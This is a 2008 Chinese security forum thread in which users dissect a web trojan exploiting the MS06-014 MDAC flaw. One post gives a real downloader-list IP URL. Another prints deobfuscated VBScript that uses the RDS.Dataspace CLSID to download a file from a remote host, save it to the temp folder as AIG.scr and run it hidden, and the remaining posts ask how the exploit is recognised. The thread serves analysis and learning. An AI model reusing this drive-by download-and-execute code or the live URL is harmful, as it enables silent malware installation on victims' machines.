听说卡饭是国内最强，所以发到此地。

will

Downloader List:
http://59.34.197.63/asp.txt

深红的雪

MS06014网马

话说楼主在哪里听说卡饭是国内最强的 请不要当真~

[ 本帖最后由 深红的雪 于 2008-11-18 21:28 编辑 ]

vive

新手看不明

qianwenxiang

    on error resume next '容错
    'AEEWewhurl = "http://IP/exe1/ms.css"
    'AEEWewh="object"
    'AEEWewh2="classid"
    'evilx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    'AEEWewh3="Microsoft.XMLHTTP"
    'AEEWewh4="Shell.Application"
    'AEEWewh5="Scripting.FileSystemObject"
    '一大堆变量连来连去..
    evilcutex="AIG.scr"
    Set evilcute = document.createElement("object")
    evilcute.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    Set wing = evilcute.CreateObject("Microsoft.XMLHTTP","")
    set fsoObj = evilcute.createobject("Adodb.Stream","")
    fsoObj.type = 1
    wing.Open "GET", "http://IP/exe1/ms.css", False
    wing.Send
    Set Virus = evilcute.createobject("Scripting.FileSystemObject","")
    'fso fso..
    Set evilcutes = Virus.GetSpecialFolder(2)
    'Specialfolder2= %Temp%
    fsoObj.open
    evilcutex= Virus.BuildPath(evilcutes,evilcutex)
    'BuildPath(Path,Name)
    fsoObj.write wing.responseBody
    fsoObj.savetofile evilcutex,2
    fsoObj.close
    set evilcutes = evilcute.createobject("Shell.Application","")
    evilcutes.ShellExecute evilcutex,"","","open",0
    'shellexecute ,,,0 = hide

代码被修改的体无完肤 整理下大概这个吧....反正一个ms06014的

terryyule

原帖由 qianwenxiang 于 2008-11-18 19:24 发表
代码被修改的体无完肤 整理下大概这个吧....反正一个ms06014的

版主已经很接近了，但是能更平民化点么？

最好是每一行代码，做个简单的解释。

还有能解释下如何确认是MS06-014漏洞网马么？

terryyule

原帖由 will 于 2008-11-18 18:00 发表
Downloader List:
http://59.34.197.63/asp.txt

请问如何得到此木马列表地址？代码中又是如何实现按列表中指定的信息下载木马的？

[ 本帖最后由 terryyule 于 2008-11-18 19:53 编辑 ]

qigang

这地址不新了的。

zzh161

这到底是要干什么啊，我家机器人果然耐心讲解

jimmyleo

clsid:BD96C556-65A3-11D0-983A-00C04FC29E36

这个熟悉的类id能告诉你 她是0614

qianwenxiang

....真想纯表....把那个"头衔"去掉行不...